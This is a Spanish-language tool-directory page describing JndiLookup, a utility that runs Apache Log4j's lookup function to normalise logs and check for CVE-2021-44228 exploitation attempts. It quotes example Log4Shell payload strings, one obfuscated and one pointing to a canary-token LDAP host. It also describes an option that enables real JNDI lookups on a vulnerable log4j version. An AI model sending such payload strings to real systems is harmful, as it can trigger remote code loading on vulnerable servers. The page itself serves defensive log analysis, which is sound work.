Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
JndiLookup — Algunas herramientas para ayudar a mitigar Apache Log4j 2 CVE-2021-44228 | Kitploit
Herramientas/GitHubGitHub/madcdan/jndilookup
Análisis Dinámico (Sandboxing)Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónComando y ControlAnálisis de Registros
GitHubmadcdan/jndilookup

JndiLookup

Algunas herramientas para ayudar a mitigar Apache Log4j 2 CVE-2021-44228

Ver Repositorio
32hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

JndiLookup

Alguna herramienta para ayudar a analizar Apache Log4j 2 CVE-2021-44228

Esta herramienta utiliza la función "lookup" de log4j-2 para probar la vulnerabilidad JNDI. El objetivo es ejecutar fácilmente la función lookup (para normalizar registros, por ejemplo, o para hacer una prueba real sobre algún payload; tenga precaución).

Para compilar: "make" (por conveniencia, el archivo JndiLookup.jar está incluido en este git).

Una vez compilado, puede ejecutar la herramienta con "java -jar JndiLookup.jar" (el directorio log4j con los binarios de log4j debe estar en la misma ruta que JndiLookup.jar)

Sin argumentos, la herramienta JndiLookup lee líneas desde stdin y las "convierte" usando la función lookup de log4j; esto debería ser útil para normalizar registros y buscar intentos de explotación.

Por ejemplo: cat access.log | java -jar JndiLookup.jar

Si pasa una cadena a la línea de comandos, la herramienta convertirá esa cadena y saldrá (por favor, escape todos los caracteres '$').

Por ejemplo: java -jar JndiLookup.jar java -jar JndiLookup.jar "\${jndi:\${lower:l}\${lower:d}a\${lower:p}://world443.log4j.bin\${upper:a}ryedge.io:80/callback}"

De forma predeterminada, el lookup JNDI está deshabilitado (y se reemplaza por una función lookup que solo agregará "jndi:", pero es posible habilitar el lookup JNDI real pasando el parámetro "-X" a JndiLookup ("-X" debe pasarse como primer parámetro); TENGA MUCHA PRECAUCIÓN con esto porque podría comprometer su sistema.

Por ejemplo: java -jar JndiLookup.jar -X "\${jndi:ldap://w8pcb14reujq65vic39pz9amv.canarytokens.com/a}" [ Este ejemplo usa uno de mis canary tokens, es solo para el ejemplo; sepa que seré notificado si usa este comando; por mi parte no hay problema, pero obtendré la IP desde la que se realiza la solicitud DNS ]

Los siguientes lookups están habilitados en los binarios de log4j utilizados (2.15.0 para uso estándar, 2.14.1 para uso con JNDI habilitado):

  • log4j
  • sys
  • env
  • main
  • marker
  • java
  • base64
  • lower
  • upper
  • date
  • ctx

Otros lookups pueden estar disponibles según su entorno:

  • docker
  • kubernetes
  • spring
  • jvmrunargs

[ Consulte https://github.com/apache/logging-log4j2/blob/c30a1398a6697fb832c650870c44284d0052103e/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java para obtener detalles sobre la activación del plugin lookup]

Tenga en cuenta que esta herramienta usa el código real de la función lookup de log4j y podría ser vulnerable debido a otros problemas de seguridad (no relacionados con JNDI).

Descargar herramienta